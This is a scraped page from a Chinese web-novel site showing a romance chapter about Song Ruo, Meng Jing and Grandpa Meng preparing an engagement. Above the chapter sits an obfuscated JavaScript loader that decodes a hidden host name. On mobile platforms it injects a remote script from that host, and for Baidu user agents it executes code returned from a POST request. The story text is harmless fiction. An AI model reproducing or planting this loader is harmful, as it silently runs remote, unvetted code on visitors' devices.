98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(6)(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

孟卫国摆摆手:过分谦虚就等于骄傲了啊。说完又是一阵欢喜,你这孩子,居然数学也这么好,还有多少本事是深藏不露的?

宋若讷讷的,涨红了脸不能答,憋了足足三十秒,才扶着眼镜说:就这点三脚猫功夫,都拿出来了。

孟卫国一阵爽朗大笑,浑不似正在准备开颅手术的病人,笑完立刻变脸,严肃地望着孟璟:你看看,我们若若这么优秀还这么谦虚,配你可真是委屈了。还不给我努力点!

孟璟:我好像是被逼婚的吧。

次日班上也够沸腾的。

宋若早上到学校,班上的同学们望着她的目光多了一层深意就算了,毕竟不熟,爱怎么揣测就怎么揣测,可林尽染也趴在墙上瑟瑟发抖,拿惊疑不定的眼神瞅着她。见她在身边落座,更是剧烈地抖了两抖。整个人极富戏剧张力。

宋若实在忍不住了,手指摩挲着口罩的带子,轻声问:染染,你干嘛。

别和我说话!林尽染一脸惊恐的莫挨老子。

现在戴不戴口罩,露不露真容,再也不是问题的焦点了。

宋若轻叹一口气:有话好说嘛,我哪里得罪你了?

林尽染带着哭腔的声音:不是你得罪了我,是我,是我有眼不识泰山,没料到若若是这么可怕的大学霸,是我不自量力了,居然敢与你称姐道妹。你走,别打扰我自闭。

宋若有点哭笑不得,只能打太极安慰道:我只这科好点,其他都很差的。

就算你其他的不及格吧,那数学好成这样也已经很恐怖了好吗!黄蓉才一百零几,你一百五,你是人吗你。林尽染精神在崩溃的边缘,絮絮叨叨兀自说着,数学好的人,心思缜密,城府极深,不算计还好,一算计简直分分钟置人于死地!我看错了你!

什么歪理。宋若无力扶额,举起手指天发誓:我发誓,永远永远不算计染染。

林尽染抽抽搭搭:真哒?

真哒。宋若在心里慈祥一笑。

比赛奖金发放也很及时,打在一张交行的奖学金专用卡里。她一跃成为存款两千元的大户。放了学,她在街上兜兜转转,心里有个主意,进了好几个精品店,最后仍旧一无所获。都是些小女孩喜欢的东西,不适用。直至快到孟家时,有家新开张的药店,橱窗里有东西让她眼前一亮。一排码得整整齐齐的U型枕。

回到孟家时,正热闹。

有一波人将大厅家具往仓库挪,因为是比较低调的订婚仪式,就在家中举行,宴会地点选在了这。另外有几个人往孟家抬东西,用梦幻的白色薄纱覆盖着,看样子是裱好的巨幅相框。

芬姨见了她时连连招手,宋小姐,你和大小姐的婚纱照送来了。

宋若再次要求:芬姨,叫我宋若就可以了。

芬姨的注意力却移到她怀里抱着的东西上头,哎唷了一声:靠枕?做什么用?

宋若有点难为情,含糊应了一声,就搭讪着回了房间。到晚餐之前,她才捧着那难登大雅之堂的东西下楼来。搬得只剩下沙发、茶几和饭桌等基本生活用品的一楼大厅,显得格外空旷。孟卫国和孟璟正在沙发上斗嘴,吵着两张照片哪张拍得更好,更适合挂在正厅。孟卫国说是搂腰的那张好,孟璟说不是,搂肩膀那张最好。

也许是前天孟爷爷说的那些配不配得上的话伤害了孟璟的骄傲,这阴郁女主还真阴郁了两天,在家没什么话,在学校也是跑去泡游泳馆,宋若后背的位子一直空着。

这时才算恢复了元气。

孟璟见了她,啊了一声,语调带着慵懒,语气却正直得不行:爷爷,我老婆来了,让我老婆决定吧,我相信我老婆的眼光。

这人绝对是故意的。一句话里出现了三个我老婆,不就是想膈应膈应她。宋若心里愤愤然,奈何还不能戳穿她。

孟卫国声音里透露出强烈的愉悦来:对对对,若若,你看一下,你说哪张就哪张。

如果真去看靠在对面墙上的两张巨幅照片,那么就不可避免地要看到阴郁女主的真容了。在原著小说里,孟璟之所以吃得开,一个原因当然是投胎技术过硬,其次就是颜好了。原主固然贪心,但首先她是个一言难尽的颜狗,所以才会一见孟璟误终生,从此毕生都活在求而不得的桎梏之中。宋若相信自己是理性的,可人生总是难以预料,万一呢,她这种从没谈过恋爱的深柜姬

孟爷爷在催了:若若,哪个好?

按照原定策略,顺着阴郁女主的性子来,她说什么就是什么,避免激怒她,可以得保无虞。

但这次,宋若不想这样做。她被那人一口一个我老婆给刺激到了。

说出搂腰那张好的时候,宋若在心里自嘲了一下,她觉得林尽染没说错,她确实精于算计,二选一而已,五个字的答案,配套的内心戏已经飚了五千字。

孟卫国哈哈大笑:看吧,是我的好孙媳妇儿。

孟璟轻呵了一声。

宋若头皮一麻,背上莫名有些寒浸浸的,赶忙转换话题,将手上的靠枕送上去,孟爷爷,这个送您。

原主也送过孟爷爷东西,是她亲手织的围脖、手套等等。原主宋若小姑娘是个心灵手巧的主儿,琴棋诗画无不精通,还会各种现代社会久已失传的刺绣、女红,插花茶道也不在话下,她实打实是把自己当豪门少奶来培养的。

宋若就算有她那样的野心,也不行,她手残。

原主送的小物件,孟璟嗤之以鼻。宋若送的这个靠枕,花一百块买的,孟爷爷笑纳了,孟璟居然也没说什么。

晚饭桌上她依旧没说什么,直到两人上楼回房间,宋若正推开房门,腰上忽然一阵灼灼的暖意,人也被一股力道给带得偏了偏,她低头去看,有只纤长的手揽着她的腰。

宋若轻声说:手拿开。

诶,不是搂腰更好么?孟璟的语调压得很低,带了点嘲戏的笑意,老婆还喜欢什么,我都可以效劳啊。

宋若脸僵了,从没被女人近距离撩过的她,半边脑壳发麻,冲动之下脱口而出:你、你有病是不是。

你猜。

宋若稳定了一下心神,慢慢镇静下来,用建设社会主义新农村的肃穆口吻说:好玩吗,孟大小姐?还记得契约内容吗。

孟璟一顿,规规矩矩把手收了回去,耸耸肩,不好玩。晚安,宋小姐。

宋若并没有回她一句晚安,虽说只是一场虚惊,那被狼爪子搂过的地方,灼热的感觉久久挥之不去。洗澡时,她皱着眉头,拼命洗了好几遍。

到了次日,下了第二节 课,她去学校电视台准备接受采访,仍不时下意识抬手捂腰。

阴郁女主是会铁砂掌吗。

是她大意了,搓得越狠,那感觉越是历久弥新。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间